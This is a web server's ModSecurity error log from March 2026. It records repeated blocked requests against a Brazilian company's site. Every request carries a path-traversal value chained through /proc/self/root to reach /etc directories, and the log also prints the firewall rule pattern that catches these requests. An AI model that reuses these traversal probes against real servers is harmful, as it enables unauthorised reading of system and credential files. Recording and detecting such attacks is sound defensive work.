[Fri Mar 20 06:37:01.369687 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:48428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VPeoXxyEfFpUF8f9xIwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:02.907006 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:48438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VPta6ubjKNq_cu4bCAgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:04.076329 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.241.31:48442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VQDJ3M9BSuKP7CAYHPwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:05.681525 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:52496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VQTJ3M9BSuKP7CAYHRgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:06.759003 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:48456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VQvHIg5MgXLBnicPonQAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:09.168199 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:52512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VRBCii7xarUs8iHZXfQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:11.322864 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:47018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VRwF0L0L-SsrnPo5W0QAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:11.645175 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:45382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VR_HIg5MgXLBnicPoogAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:12.629080 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.241.31:47030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VSPHIg5MgXLBnicPopQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:12.844149 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:45396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VSPHIg5MgXLBnicPopgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:14.838707 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:47046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VSvqxLDW4GITHUkTUfwAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:17.232909 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:45410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VTQF0L0L-SsrnPo5W1wAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:17.268860 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.241.31:47048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VTTJ3M9BSuKP7CAYHSwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:19.989884 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:45420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VTvHIg5MgXLBnicPorwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:21.335116 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:34328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VURCii7xarUs8iHZXfgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:22.081484 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:42502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VUta6ubjKNq_cu4bCDgAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:24.790328 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:42504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VU_qxLDW4GITHUkTUigAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:26.174838 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:42518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VVta6ubjKNq_cu4bCFAAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:27.966883 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:55600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VV_XLqtnMIWvjpaKJgAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:37:27.981445 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:34340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VV_qxLDW4GITHUkTUkAAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:37:29.371292 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:55608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VWfqxLDW4GITHUkTUkgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
